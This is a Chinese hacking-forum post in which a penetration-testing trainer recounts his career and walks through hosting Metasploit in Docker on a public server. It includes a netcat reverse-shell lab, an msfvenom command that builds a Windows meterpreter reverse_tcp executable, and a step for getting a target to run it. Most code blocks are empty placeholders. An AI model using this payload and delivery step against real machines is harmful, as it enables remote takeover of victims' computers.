必火老师教你打造自己公网上的渗透神器-metasploit - 女黑客 - Powered by Discuz!

女黑客

标题: 必火老师教你打造自己公网上的渗透神器-metasploit [打印本页]

作者: nvhack    时间: 2019-11-3 12:26
标题: 必火老师教你打造自己公网上的渗透神器-metasploit
                                     大家好,我是必火,从事IT行业15年了,接触安全渗透测试10年有余,从事安全教学3年,这三年没有好好写文章了,今天感慨一下。

0x01:有心栽花花不开,无心插柳柳成荫
     话说我当时在天融信上班,上的好好的,并不想走教育,只是当时被朋友叫去某培训机构要当讲师,其实我还没打算去呢,结果被他部门负责人怀疑我的能力,连面都没见,就说不用去看了,肯定不行,很气愤,既然这样,那我就去竞争对手家当讲师呗。

0x02:路,要一步一步走
    没有讲师经验的我,准备了七天时间,就直接上台讲课了,我是一个很认真的人,技术应该也不太差,但是要连续讲一个月渗透的知识,并且下面还有四五十的学生,不好好准备是不行的,所以基本上每天都半夜一点多睡觉,看第二天讲课的讲义。

0x03: 一入讲师深似海,再想跳出难如天。
     每一个班级的结束,我都能得到许多宝贵的经验,有些知识,不是你会了,就一定会把大家教会,这完全是两个概念,就比如SQL注入,牵扯的东西太多,你讲SQL注入,但学生根本不懂数据库,那你讲SQL注入怎么能讲明白,你还需要讲数据库,讲完数据库,学生还不知道在网站中数据怎么传值怎么取出的,那你还要讲php,那又会牵扯N多的东西出来,比如:url中index.php?id=1,问号是什么意思,可不可以有两个“?”,报错注入和布尔型注入在代码中有什么不同?......
     三年了,带了差不多500名左右的学生,有没摸过电脑的,有初中毕业的,有厨师,有孩子妈......什么学生都有,就是没有毕业找不到工作的。
       这三年来,很累,时常想逃避,特别怀念渗透测试的日子,因为可以汲取更多的知识,我的想法很强烈,但是真的被学生留了下来,因为我走不开,好多学生来学习,就是看我来了,我若走了,无法给他们交代,还有,去哪里找我这样前无古人后无来者负责任的讲师呢。。。所以不走了,好好干教育吧,让天下有我正教育之风。

0x04: 外网打造自己的metasploit 神器。
        大家都知道metasploit 神器,kali已经集成了,那么只需要买一台服务器装上kali不就可以了?是的,没问题,这个想法可以,但是好好的服务器,你不就是浪费了,我们都是打工仔,谁有那么多钱浪费。
        其实不用这样,正常买一台服务器即可,装上另一个神器docker,就可以解决问题,我拿自己的服务器举例,我的服务器是CentOS 7 ,我现开始装docker
0x05:CentOS 7 安装docker
1、Docker 要求 CentOS 系统的内核版本高于 3.10 ,查看本页面的前提条件来验证你的CentOS 版本是否支持 Docker 。通过 uname -r 命令查看你当前的内核版本
复制代码
2、使用 root 权限登录 Centos。确保 yum 包更新到最新。

复制代码
3、安装需要的软件包, yum-util 提供yum-config-manager功能,另外两个是devicemapper驱动依赖的


复制代码
4、设置yum源



复制代码
5、可以查看所有仓库中所有docker版本,并选择特定版本安装

复制代码

6、安装docker  选择一个版本安装就可以了

复制代码
7、启动并加入开机启动

复制代码
8、验证安装是否成功(有client和service两部分表示docker安装启动都成功了)

复制代码

如有问题,请微信或者电话联系必火:18622800700
0x06: docker安装metasploit1、搜索仓库中metasploit镜像
复制代码

2、安装 remnux/metasploit
复制代码
3、等待,取决于网速,大概几个小时。网速快几分钟。然后查看下载好的镜像
复制代码

4、新建一个容器,首次运行需要下载很多东西,等一会 --name ooo 给容器取个名字,
复制代码

5、更新好了之后,会自动进入root@05351fccde1f:/tmp/data#
启动 msfconsole 即可
复制代码

6、更新metasploit
复制代码
7,exit 退出msf,再exit,退出当前docker
复制代码
8,docker ps -a 显示所有容器
复制代码

9、保存这个容器为镜像(这里首先用docker ps -a 查看这个容器的id 或它的名字)
以下两行代码效果一样
复制代码
8、保存容器后,容器就变为镜像了,给新的镜像起一个名字。
复制代码
9、重新运行新的镜像,并做端口转发,
复制代码
10、服务器防火墙设置对外开放的端口

11、nmap 扫描外网ip端口,发现防火墙允许的端口都开放了

0x07: 反弹shell 实验
1、docker 中 运行nc 来监听 11111 等待链接

2、本地局域网 链接远程服务器IP+端口

3、组图,准备敲回车。

4、反弹shell成功

5、运行ipconfig

至此,服务器搭建metasploit成功,而且不影响服务器做自己的正事,你该做网站服务器就做网站服务器,你做数据库服务器,就做数据库服务器,根本不影响运行。
0x09:实验二,生成windows被控端
1、msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe
ip地址自行替换为你的服务器ip地址和相对应的端口

复制代码

2,msf配置相关模块
复制代码

3、等待目标连入

4、下载hack.exe 给目标运行,可以考虑使用ftp,因为生成的hack.exe 在docker中,
复制代码

5、被控端上线

background 后台运行
sessions 查看当前被控端会话数

0x08: 参加培训,请联系必火 微信手机同号:18622800700
                                



作者: 网络安全培训    时间: 2019-11-6 12:08
大佬,大佬,我可以发帖了




欢迎光临 女黑客 (http://www.nvhack.com/) Powered by Discuz! X3.4